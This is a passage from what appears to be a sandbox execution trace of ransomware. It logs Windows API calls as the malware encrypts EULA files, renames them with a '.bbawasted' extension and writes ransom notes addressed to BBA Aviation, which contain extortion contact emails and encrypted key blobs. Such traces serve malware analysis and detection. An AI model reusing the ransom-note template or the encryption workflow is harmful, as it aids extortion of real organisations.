61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]dffSfvgWP0E2I50qLJivOIb5ibLHjMNaxs2V7haZ9H9WrXL/rX+udG40cWdVJN9/\r\n6oVeqLAS5CfCGyHoLxYA4SOhED8VIwrBhuKjMDufPCsQWNcJ+AR232mgRu/rZynx\r\nEvyZHbucGvbcthOamg8Wl1uOhj88V+BMXfEzgRi/IJvPv/vVwLSWWnYoHH9AHc46\r\noGF3pkXBnuKZB5y74nUBDcDjbUjJLxxs4I5RpGI/wJhAzFzGO7lmg0ZUmLzMBm1S\r\nMoo/vt0JC3HWat4efJgV0A6lT4Q/SneDFq5Ob9lzZUMt2xgMz0SuLVITjXWkDoKc\r\nRRkVaUKInhWO1jBe0KDshQX3MvjEKc5AgWAlaqWw1pQ026avW6RKFuNo90jipxOZ\r\nZ1YfoJEqjHiyNEJGMh6XggMG0Mgbv2t3fJ2MvsFpqwC0Did6Qz9MqAot4f3DJp8C\r\nQr9NoS0murRpkiKKoFsLHRgicfiP1J7LgGMwMRGuNMkj1a85mScQrnwa99q85PLu\r\nXZZzSJ/dOqu6rlzPYIZRzxURUtOQ5+ZDOtsPcd00cREr667aEjnttJmgy1bdNr1j\r\ncY/RmCr0nabPtmUWlUMlEBwOSLdY/N1QqOiUzId40wuCOfL/jhF4sRsH73VrQ6Gj\r\nP4h35RdoU0MJNrr4ui6dHxgiWScPZkyJQCgt0B+FkFW=[end_key]\r\nKEEP IT\r\n") returned 984 [0236.660] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0236.660] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0236.661] SetEndOfFile (hFile=0x290) returned 1 [0236.664] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0236.664] CloseHandle (hObject=0x290) returned 1 [0236.664] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0236.665] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c1f28 | out: hHeap=0x660000) returned 1 [0236.665] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5f10) returned 1 [0236.666] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0236.666] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0236.666] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ja-jp.htm") returned 56 [0236.666] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0236.666] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0236.667] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0236.667] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a61b8) returned 1 [0236.667] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0236.667] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0236.667] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ja-jp.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ja-jp.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0236.669] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0236.670] SetEndOfFile (hFile=0x290) returned 1 [0236.671] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.671] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0236.671] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0236.671] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ja-jp.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ja-jp.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ja-jp.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ja-jp.htm.bbawasted")) returned 1 [0236.672] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ja-jp.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ja-jp.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0236.672] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0236.673] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x3354e [0236.673] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3354e) returned 0x1480000 [0236.673] CloseHandle (hObject=0x27c) returned 1 [0237.046] UnmapViewOfFile (lpBaseAddress=0x1480000) returned 1 [0237.049] CloseHandle (hObject=0x294) returned 1 [0237.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa3d8 [0237.049] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6240) returned 1 [0237.049] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x6aa420 | out: pbBuffer=0x6aa420) returned 1 [0237.049] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0237.050] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a5f10) returned 1 [0237.050] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0237.050] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0237.061] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0237.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa3d8 | out: hHeap=0x660000) returned 1 [0237.061] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.062] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]jptMRsLKlDq49Qqaic5CzbjjwSinQbnBKCwlwkjo0mpa6nSJKc0RcO2+pVWj0CF5\r\njuHkkDGBt8u4jAVR4sgxA0mJmmt2fdzaD7Q3nFm1suNVT0hR29VyhQBdKWhDIsco\r\nJOF4ugMJxzaNrYhM0O96jC42Wep9Biz28PewzwmJ61uK4Z3LpSHcTbwqakvrNZ8/\r\nwVNBNXwGAiwt+5xA1s4UL+GnvRCGAJ93ygq4OZuDawWxVPtzhq3OQOMuk6ESrT9A\r\n4Uke5ctVaNIkY38NzYdHlkdokYWfkfq/W3fILdKYiml0ZZ3wjK2GNoFcMXLnP8k4\r\nR2SIhgdmBi9JSnQaRRghRWhK+f0Ef3ZgA8tZ2OZRWgvXdwZTRSRRYdXOvey+FgbT\r\n/ZwJnAXM0dWzUGZV/bYFLG57D42/tNba7hSLQMYLH1hJji5ux9R7q2o3P4kBbHw2\r\nAH1dH3XLWnvwGSSMhyOwaCKxqwKwnKmbnO6tyN84LMxba3A7E8iFG0SQVgvJD8N1\r\nukKyrAzVva56t3M+6UdImCZbpPJFZDi7+QEl34qLdOKHPFd5SDoFq8orE6nBrAKG\r\nauDAzX7jo/+aaD7e8Z4DkXJJEaHVn43cO6j7ame7zjOFga4o/QFccTY+IqwHI5Qf\r\nuoNtPmbj1VIkvulAqFpvkpv+z5k0/dIRHUhfqmvczOv=[end_key]\r\nKEEP IT\r\n") returned 984 [0237.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0237.062] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0237.062] SetEndOfFile (hFile=0x290) returned 1 [0237.065] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.065] CloseHandle (hObject=0x290) returned 1 [0237.065] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0237.065] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c1ff8 | out: hHeap=0x660000) returned 1 [0237.065] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6708) returned 1 [0237.066] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0237.066] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0237.066] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lt-lt.htm") returned 56 [0237.066] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0237.066] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0237.067] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.067] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6680) returned 1 [0237.067] CryptGenRandom (in: hProv=0x6a6680, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0237.067] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0237.067] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lt-lt.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lt-lt.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0237.068] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0237.070] SetEndOfFile (hFile=0x290) returned 1 [0237.070] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.070] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0237.070] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lt-lt.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lt-lt.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lt-lt.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lt-lt.htm.bbawasted")) returned 1 [0237.071] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lt-lt.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lt-lt.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0237.071] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0237.072] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x1293b [0237.072] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1293b) returned 0x5f0000 [0237.072] CloseHandle (hObject=0x294) returned 1 [0237.243] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0237.244] CloseHandle (hObject=0x280) returned 1 [0237.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa9f0 [0237.244] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6350) returned 1 [0237.245] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x6aaa38 | out: pbBuffer=0x6aaa38) returned 1 [0237.245] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0237.245] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6818) returned 1 [0237.246] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0237.246] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0237.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0237.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa9f0 | out: hHeap=0x660000) returned 1 [0237.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.257] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]UOvqh0Xz9gbJUKTvyXrocACUleqtu1NfkjKFq0mFhUGD2kfg9w9YeixA9x/fDnjS\r\njRj3HdxEKyltSfx1JY35STcAeQfpPMBYAOvoY1oTG6i0pyJgIbYhiHjA3W9ynuOY\r\nzhdGBANXmtdqB1fM69Ix+I6wTqOaN1jeyt5ZsANwyOSG2Ed+zpi7Hj5ZgaDGgOtM\r\nOw4P/vUp+QVT/FL/ahoGVjzO5WQbw65CVSLcvhoCzgQ3UIp44XrvByKy+wQveTpO\r\nMPITTycaPaHiLPGls7ynhuYWGyKEJfV94l/qWVj/PpxzK4ZmtFlNUlYgyU5hvUg9\r\nnTfYj3XAveOZ3PfSlltMftpO3C3Y9XLN/DcOdZZO6EM5VNz9Jq5LbpwAe6GutJlj\r\nHZOmhKcUk+dSueCP2nUrAW1FhFh20Xjvkc1yExEDqwkh2RqypR2/SyHLKY/OLu6A\r\nCKop1qMCQyDd8sEIYQoSijnRv4c9Wy+E5cgLdaRRnktu+5oP7sqsifWobX8Ssiod\r\nbxhIlo0lWwMLL7BL5EmVpm+BcbCt9QRZ+3PI7gt6LE4oq9482wIbjb5FgnZneIk2\r\nD39xZb9/3NKxn//fJ7SB1pELR9Xpe4Uv7RfCTtC0pwzF2M9Vr2Bjhq/irttMpROH\r\nOHTlMqMQo0f1Jzt+bswT3T25ZA1Fg00y8UbSeBQKi2g=[end_key]\r\nKEEP IT\r\n") returned 984 [0237.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0237.257] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0237.257] SetEndOfFile (hFile=0x290) returned 1 [0237.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.260] CloseHandle (hObject=0x290) returned 1 [0237.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0237.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c20c8 | out: hHeap=0x660000) returned 1 [0237.260] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5f10) returned 1 [0237.262] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0237.262] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0237.262] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lv-lv.htm") returned 56 [0237.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0237.262] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0237.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.262] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6570) returned 1 [0237.263] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0237.263] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0237.263] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lv-lv.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lv-lv.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0237.264] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0237.266] SetEndOfFile (hFile=0x290) returned 1 [0237.266] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.266] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0237.266] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lv-lv.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lv-lv.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lv-lv.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lv-lv.htm.bbawasted")) returned 1 [0237.267] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lv-lv.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lv-lv.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0237.267] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0237.268] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x147c5 [0237.268] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x147c5) returned 0x5f0000 [0237.268] CloseHandle (hObject=0x280) returned 1 [0237.271] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0237.273] CloseHandle (hObject=0x27c) returned 1 [0237.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa5e0 [0237.273] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a64e8) returned 1 [0237.273] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x1b8, pbBuffer=0x6aa628 | out: pbBuffer=0x6aa628) returned 1 [0237.274] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0237.274] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a61b8) returned 1 [0237.274] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0237.274] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0237.391] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0237.391] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa5e0 | out: hHeap=0x660000) returned 1 [0237.391] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.391] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]g2t8+0ZccL7YwVmjA9axH+JDMQpFy4Gj1AVODgEpSKUq368jBJM4usGMjYPO/m+1\r\n3G5sqmidoteFbwB2Gs9OHgrO4XUUtc9OqCk/R7bPLIcei/4TgdRS1FY6mq9GXclO\r\noZGx91Do7TFrNeCkhskx3TSbj2ZttrQcJS0iRUmT6y4ng72G1QV0k8o85DJ5WYpk\r\nRrHe+J/oVne0q2yohg51PIBWWBg9UX4N5Pb3640rAKPdx1DviMlLdZ9feUenpUCy\r\n4mEYBAkD7I7fRxOuDpmrWgIZG9UvuwsiCI0jnbFJ5+BpKIJ0r97S+bax9vovPtAl\r\nsCsBVOCqzfALuR2WqUoa/mEBggSP6/cF3jFQJCKjOC1rnamzPCiKXU7Y1iaAA2ai\r\n8vjbAnE1TcFIJASUTywKH3Lp+90SwMtZpb46LgYf74boyXcU+ncaUaEyJc/BKxJl\r\nLItDJzBwFAMpQgwaaXiGzOQWPciV+H3txw1hwHi1nbw+NMExSzsjckb4Ne71uJ73\r\nB9NqS8LeB0M/pFnrlaKYgRey+Yedo+HBu4WO3B751cPS/GlxFAHp5WPuQAiZCkgx\r\noLcoNJko0A8w6eQ4hkWYckKh5VU82MeCZHQqULY9/m1w/cH2/jThZMQ7DS5qbt0N\r\nOwziHtQSpuvXv9MbIMwBH++Qd0Urc4agrYJLARPutA3=[end_key]\r\nKEEP IT\r\n") returned 984 [0237.391] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0237.391] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0237.391] SetEndOfFile (hFile=0x290) returned 1 [0237.394] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.394] CloseHandle (hObject=0x290) returned 1 [0237.394] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0237.395] HeapFree (in: hHeap=0x660000, dwFlags=0x0, 